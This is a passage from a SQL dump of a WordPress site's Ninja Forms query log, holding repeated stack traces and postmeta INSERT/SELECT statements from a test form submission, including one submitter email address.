,\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(45,23,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162774, \'_field_302\', \'Test 3\')',NULL,NULL),(46,23,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(47,24,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 162774',NULL,NULL),(48,24,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(49,25,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162774, \'_field_303\', \'Testing---3\')',NULL,NULL),(50,25,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(51,26,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162774',NULL,NULL),(52,26,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(53,27,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162774, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(54,27,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(55,28,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162774',NULL,NULL),(56,28,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(57,29,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162774, \'_field_306\', \'Youth and Fam Test ----3\')',NULL,NULL),(58,29,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(59,30,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 162774',NULL,NULL),(60,30,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(61,31,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162774, \'_field_307\', \'Youth and Fam test -------3 \')',NULL,NULL),(62,31,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colora